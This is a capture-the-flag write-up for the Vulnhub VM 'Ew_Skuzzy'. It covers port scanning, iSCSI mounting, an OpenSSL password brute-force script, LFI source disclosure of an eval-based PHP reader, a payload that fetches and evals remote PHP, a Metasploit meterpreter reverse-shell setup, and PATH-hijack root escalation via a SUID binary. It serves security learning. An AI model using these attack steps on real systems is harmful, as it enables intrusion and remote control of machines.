CTF Ew_Skuzzy from @vortexau (Vulnhub)

You can find it on Vulnhub HERE.  As usual you can contact me on twitter @marghost.

First thing first nmap

[code]root@kali:~# nmap -T4 -A -v

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-03-23 23:32 EDT
NSE: Loaded 140 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 23:32
Completed NSE at 23:32, 0.00s elapsed
Initiating NSE at 23:32
Completed NSE at 23:32, 0.00s elapsed
Initiating ARP Ping Scan at 23:32
Scanning [1 port]
Completed ARP Ping Scan at 23:32, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 23:32
Completed Parallel DNS resolution of 1 host. at 23:32, 0.00s elapsed
Initiating SYN Stealth Scan at 23:32
Scanning [1000 ports]
Discovered open port 80/tcp on
Discovered open port 22/tcp on
Discovered open port 3260/tcp on
Completed SYN Stealth Scan at 23:32, 0.06s elapsed (1000 total ports)
Initiating Service scan at 23:32
Scanning 3 services on
Completed Service scan at 23:34, 93.78s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against
NSE: Script scanning
Initiating NSE at 23:34
Completed NSE at 23:34, 0.10s elapsed
Initiating NSE at 23:34
Completed NSE at 23:34, 1.02s elapsed
Nmap scan report for
Host is up (0.00032s latency).
Not shown: 997 closed ports
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 89:c2:ae:12:d6:c5:19:4e:68:4a:28:e9:06:bd:9c:19 (RSA)
|_  256 f0:0c:ae:37:10:d3:6d:a2:85:3a:77:04:06:94:f8:0a (ECDSA)
80/tcp   open  http    nginx
| http-methods:
|_  Supported Methods: GET HEAD
|_http-server-header: nginx
|_http-title: Welcome!
3260/tcp open  iscsi?
|_iscsi-info: ERROR: Script execution failed (use -d to debug)
MAC Address: 08:00:27:60:88:83 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Uptime guess: 0.000 days (since Thu Mar 23 23:33:47 2017)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

1   0.31 ms

NSE: Script Post-scanning.
Initiating NSE at 23:34
Completed NSE at 23:34, 0.00s elapsed
Initiating NSE at 23:34
Completed NSE at 23:34, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.65 seconds
Raw packets sent: 1023 (45.806KB) | Rcvd: 1015 (41.290KB)[/code]

Ok so a webserver and something named iscsi.

Nikto said noting to me.

dirbuster medium 2.3 dictionary said noting to me.

dirb with the big.txt dico found some smblogin portal.  Everyting is forbitten and i cant seem to find things on it with google.  I keep this in mind.

[code]root@kali:~# dirb /usr/share/dirb/wordlists/big.txt ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Fri Mar 24 00:40:35 2017 URL_BASE: WORDLIST_FILES: /usr/share/dirb/wordlists/big.txt ----------------- GENERATED WORDS: 20458 ---- Scanning URL: ---- ==> DIRECTORY: ---- Entering directory: ---- ==> DIRECTORY: ---- Entering directory: ---- ==> DIRECTORY: ---- Entering directory: ---- ==> DIRECTORY: ---- Entering directory: ---- ==> DIRECTORY: ---- Entering directory: ---- ==> DIRECTORY: ---- Entering directory: ---- ==> DIRECTORY: ---- Entering directory: ---- ==> DIRECTORY: ---- Entering directory: ---- ==> DIRECTORY: ---- Entering directory: ---- ==> DIRECTORY: ---- Entering directory: ---- ==> DIRECTORY: ---- Entering directory: ---- ==> DIRECTORY: ---- Entering directory: ---- ==> DIRECTORY: ---- Entering directory: ---- ----------------- END_TIME: Fri Mar 24 00:42:14 2017 DOWNLOADED: 286412 - FOUND: 0[/code]

Next i am investigating on the silly iscsi port 3260.  I do not know this but google does.  It seems to be a sort of file server that can be mounted.  Lets do that.

[code]sudo apt-get install open-iscsi nano /etc/iscsi/iscsid.conf (set node.startup to automatic) root@kali:~# /etc/init.d/open-iscsi restart [ ok ] Restarting open-iscsi (via systemctl): open-iscsi.service. root@kali:~# iscsiadm -m discovery -t st -p,1 iqn.2017-02.local.skuzzy:storage.sys0 root@kali:~# iscsiadm -m node,1 iqn.2017-02.local.skuzzy:storage.sys0 root@kali:~# iscsiadm -m node --targetname "iqn.2017-02.local.skuzzy:storage.sys0" --portal "" --login Logging in to [iface: default, target: iqn.2017-02.local.skuzzy:storage.sys0, portal:,3260] (multiple) Login to [iface: default, target: iqn.2017-02.local.skuzzy:storage.sys0, portal:,3260] successful.[/code]
First Flag!! :
[code]root@kali:~# cd /media/root/e0ca44be-b1ed-403a-84bd-db5558d6bb7e/ root@kali:/media/root/e0ca44be-b1ed-403a-84bd-db5558d6bb7e# ls bobsdisk.dsk flag1.txt lost+found root@kali:/media/root/e0ca44be-b1ed-403a-84bd-db5558d6bb7e# cat flag1.txt Congratulations! You've discovered the first flag! flag1{c0abc15976b98a478150c900ebb0c86f0327f4dd} Let's see how you go with the next one...[/code]
Ok next into that mounted part i see a file named bobsdisk.dsk.  I will mount that as well to find out what it is :
[code]root@kali:/media/root/e0ca44be-b1ed-403a-84bd-db5558d6bb7e# mkdir /bobsdisk root@kali:/media/root/e0ca44be-b1ed-403a-84bd-db5558d6bb7e# mount -o loop bobsdisk.dsk /bobsdisk root@kali:/media/root/e0ca44be-b1ed-403a-84bd-db5558d6bb7e# cd /bobsdisk/ root@kali:/bobsdisk# ls lost+found ToAlice.csv.enc ToAlice.eml[/code]
Flag2 is inside ToAlice.eml with some clue.
[code]PS: Oh, before I forget, the hacker-kid who told me how to use this new algorithm, said it was very important I used the command option -md sha256 when decrypting. Why? Who knows? He said something about living on the bleeding-edge... PPS: flag2{054738a5066ff56e0a4fc9eda6418478d23d3a7f}[/code]
Ok so bobby here seems to want me to decrypt the csv file.... jeez decryption is not my cup of tea... so wikipedia tells me that the alg on october 2000 was aes-256-cbc.  I tried to decrypt with the flag as passphrase but suuuuure it didint work.  I sa on the message ROCKYOU in MAJ so i will use the rockyou.txt password list.  I need to try them all... A little google search and i found a script that will do the job for me from http://stackoverflow.com/questions/25114571/decrypt-openssl-bruteforce
[code]#!/bin/bash # Build your list of candidates PASSWORDS=$(cat "./rockyou.txt") for PASSWORD in $PASSWORDS; do openssl enc -d -aes-256-cbc -in ToAlice.csv.enc -out ToAlice.csv -md sha256 -k $PASSWORD RET=$? if [ $RET -eq 0 ]; then cp ToAlice.csv ./working/ToAlice_$PASSWORD.csv fi done[/code]
So after 16 hours... damnit XD i found hundreds of ToAlice_X.csv into the working file!
[code]root@kali:~/decrypt/working# grep  "flag" ./* ./ToAlice_supercalifragilisticoespialidoso.csv:flag3{2cce194f49c6e423967b7f72316f48c5caf46e84},The strangest URL I've seen? What is it? [/code]
And i have the flag number 3. the csv file contain.
[code]Web Path,Reason 5560a1468022758dba5e92ac8f2353c0,Black hoodie. Definitely a hacker site! c2444910794e037ebd8aaf257178c90b,Nice clean well prepped site. Nothing of interest here. flag3{2cce194f49c6e423967b7f72316f48c5caf46e84},The strangest URL I've seen? What is it?[/code]
Going to the first path its a funcky website with a marquee ahah. OkOk i will go and post the source to :p
[code]<html> <head> <title>Hackers! They're everywhere!</title> </head> <body bgcolor="black" text="#00ff00"> <center> <marquee width="50%"><font face="arial, helvetica" size="20">HACKER DETECTED! H$ <!-- Yeah, I'm bringing Marquee back, suckers! Just not in Chrome. Thanks, Google. Firefox is still rocking the marquee tag Ge$ --> <img src="hacker.jpg" /> </center> </body> </html> <!-- R2VvcmdlIENvc3RhbnphOiBbU291cCBOYXppIGdpdmVzIGhpbSBhIGxvb2tdIE1lZGl1bSB0dXJr ZXkgY2hpbGkuIApbaW5zdGFudGx5IG1vdmVzIHRvIHRoZSBjYXNoaWVyXSAKSmVycnkgU2VpbmZl bGQ6IE1lZGl1bSBjcmFiIGJpc3F1ZS4gCkdlb3JnZSBDb3N0YW56YTogW2xvb2tzIGluIGhpcyBi YWcgYW5kIG5vdGljZXMgbm8gYnJlYWQgaW4gaXRdIEkgZGlkbid0IGdldCBhbnkgYnJlYWQuIApK ZXJyeSBTZWluZmVsZDogSnVzdCBmb3JnZXQgaXQuIExldCBpdCBnby4gCkdlb3JnZSBDb3N0YW56 YTogVW0sIGV4Y3VzZSBtZSwgSSAtIEkgdGhpbmsgeW91IGZvcmdvdCBteSBicmVhZC4gClNvdXAg TmF6aTogQnJlYWQsICQyIGV4dHJhLiAKR2VvcmdlIENvc3RhbnphOiAkMj8gQnV0IGV2ZXJ5b25l IGluIGZyb250IG9mIG1lIGdvdCBmcmVlIGJyZWFkLiAKU291cCBOYXppOiBZb3Ugd2FudCBicmVh ZD8gCkdlb3JnZSBDb3N0YW56YTogWWVzLCBwbGVhc2UuIApTb3VwIE5hemk6ICQzISAKR2Vvcmdl IENvc3RhbnphOiBXaGF0PyAKU291cCBOYXppOiBOTyBGTEFHIEZPUiBZT1UK -->[/code]
PFFF noting interesting here the base64 translation :
[code]George Costanza: [Soup Nazi gives him a look] Medium turkey chili. [instantly moves to the cashier] Jerry Seinfeld: Medium crab bisque. George Costanza: [looks in his bag and notices no bread in it] I didn't get any bread. Jerry Seinfeld: Just forget it. Let it go. George Costanza: Um, excuse me, I - I think you forgot my bread. Soup Nazi: Bread, $2 extra. George Costanza: $2? But everyone in front of me got free bread. Soup Nazi: You want bread? George Costanza: Yes, please. Soup Nazi: $3! George Costanza: What? Soup Nazi: NO FLAG FOR YOU[/code]
Ok so next i will go and challenge the other website at c2444910794e037ebd8aaf257178c90b. I thinked i would be able to just redirect the reader to an url for a web_delivery, but it was not so easy. We need a key to do that. After i tried to use LFI to get a php shell up and running but even if it is directly on the ressource i received an auth key demand. (HERE) So i readed more about LFI and found that i can obtain a base64 version of the php pages that i want with this script. thanks phil at idontplaydart.
First of all i think its not healty to be that obsessed with base64 @vortexau! so with that i obtained the contant of flag.php and reader.php once decrypted they look like FLAG 4 flag.php
[code]<?php defined ('VIAINDEX') or die('Ooooh! So close..'); ?> <h1>Flag</h1> Hmm. Looking for a flag? Come on... I haven't made it easy yet, did you think I was going to this time? <img src="trollface.png" /> <?php // Ok, ok. Here's your flag! // // flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b} // // Well done, you're doing great so far! // Next step. SHELL! // // // Oh. That flag above? You're gonna need it... ?>[/code]
[code]<?php defined ('VIAINDEX') or die('Ooooh! So close..'); ?> <h1>Feed Reader</h1> <?php if(isset($_GET['url'])) {     $url = $_GET['url']; } else {     print("<a href=\"?p=reader&url=\">Load Feed</a>"); } if(isset($url) && strlen($url) != '') {     // Setup some variables.     $secretok = false;     $keyneeded = true;     // Localhost as a source doesn't need to use the key.     if(preg_match("#^", $url)) {         $keyneeded = false;         $secretok = true;     }     // Handle the key validation when it's needed.     if($keyneeded) {         $key = $_GET['key'];         if(is_array($key)) {             die("Array trick is mitigated ;)");         }         if(isset($key) && strlen($key) == '47') {         $hashedkey = hash('sha256', $key);             $secret = "5ccd0dbdeefbee078b88a6e52db8c1caa8dd8315f227fe1e6aee6bcb6db63656";             // If you can use the following code for a timing attack             // then good luck :) But.. You have the source anyway, right? :)         if(strcmp($hashedkey, $secret) == 0) {                 $secretok = true;             } else {                 die("Sorry... Authentication failed. Key was invalid.");         }         } else {             die("Authentication invalid. You might need a key.");         }     }     // Just to make sure the above key check was passed.     if(!$secretok) {         die("Something went wrong with the authentication process");     }     // Now load the contents of the file we are reading, and parse     // the super awesomeness of its contents!     $f = file_get_contents($url);     $text = preg_split("/##text##/s", $f);     if(isset($text['1']) && strlen($text['1']) > 0) {         print($text['1']);     }     print " ";     $php = preg_split("/##php##/s", $f);     if(isset($php['1']) && strlen($php['1']) > 0) {         eval($php['1']);         // "If Eval is the answer, you're asking the wrong question!" - SG         // It hurts me to write insecure code like this, but it is in the         // name of education, and FUN, so I'll let it slide this time.     } }[/code]
Ok so here it is pretty straight foward. We need a 47 caracter key, in the flag.php it said we need this flag who it 47 car. So i will build a special web_delivery for metasploit and we will surely get shell. webdeliveryez.php
[code]##php## eval(file_get_contents('')); print("workin"); ##php##[/code]
Settin metasploit :
[code]msf > use exploit/multi/script/web_delivery msf exploit(web_delivery) > set target 1 target => 1 msf exploit(web_delivery) > set payload php/meterpreter/reverse_tcp payload => php/meterpreter/reverse_tcp msf exploit(web_delivery) > set uripath LcuwBoqEb uripath => LcuwBoqEb msf exploit(web_delivery) > set lhost lhost => msf exploit(web_delivery) > run [*] Exploit running as background job. [*] Started reverse TCP handler on msf exploit(web_delivery) > [*] Using URL: [*] Local IP: [*] Server started. [*] Run the following command on the target machine: php -d allow_url_fopen=true -r "eval(file_get_contents(''));"[/code]
After just accessed the url :
Annnnnd we got a shell!
[code]sessions -i 1 [*] Starting interaction with 1... meterpreter > shell Process 2379 created. Channel 0 created. python -c 'import pty; pty.spawn("/bin/bash")' www-data@skuzzy:~/html/c2444910794e037ebd8aaf257178c90b$ [/code]
Next we need to run some private escalation scripts. I will save you the hussle of posting the full results here, i readed it all and i found something interesting
[code]================================================================================================= LINUX PRIVILEGE ESCALATION CHECKER ================================================================================================= [*] GETTING BASIC SYSTEM INFO... [+] Kernel Linux version 4.4.0-64-generic (buildd@lgw01-56) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #85-Ubuntu SMP Mon Feb 20 11:50:30 UTC 2017 [+] Hostname skuzzy [+] Operating System __ _____ _____ | | | __|_ _ _ | __|___ _ _ ___ ___ _ _| | | __| | | | |__ | _| | |- _|- _| | |__| |_____|_____| |_____|___|___|___|___|_ |__| |___| Intentionally Vulnerable VM! Do not expose to the Internet! Developed By - vortex twitter: @vortexau email: [email protected] Hints available at /dev/null (or ping me on Twitter) Assigned IP: [*] GETTING NETWORKING INFO... [+] SUID/SGID Files and Directories -rwsr-xr-x 1 root root 8736 Mar 2 22:56 /opt/alicebackup [/code]
Ok so here we see a script named alice backup that is runned with root priv..! lets fire it up:
[code]www-data@skuzzy:/tmp$ /opt/alicebackup /opt/alicebackup uid=0(root) gid=0(root) groups=0(root),33(www-data) ssh: Could not resolve hostname alice.home: Name or service not known lost connection[/code]
Ok so interesting the script fire up id command, try to connect via ssh and die. If i poison the id process to fireup a shell, i think it would work.  So lets see
[code]cp /bin/sh /tmp/id[/code]
And next add tmp at the start of the PATH so it will fire up mine insted of the real one.
[code]www-data@skuzzy:/tmp$ export PATH=/tmp:$PATH export PATH=/tmp:$PATH www-data@skuzzy:/tmp$ echo $PATH echo $PATH /tmp:/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin:. www-data@skuzzy:/tmp$ [/code]
Exploit it end we see the FLAG 5
[code] www-data@skuzzy:/tmp$ /opt/alicebackup /opt/alicebackup # whoami whoami root # cd /root cd /root # ls ls flag.txt # cat flag.txt cat flag.txt Congratulations! flag5{42273509a79da5bf49f9d40a10c512dd96d89f6a} You've found the final flag and pwned this CTF VM! I really hope this was an enjoyable challenge, and that my trolling and messing with you didn't upset you too much! I had a blast making this VM, so it won't be my last! I'd love to hear your thoughts on this one. Too easy? Too hard? Too much stuff to install to get the iSCSI initiator working? Drop me a line on twitter @vortexau, or via email [email protected][/code]
Like a chief M.

Leave a Reply

Your email address will not be published. Required fields are marked *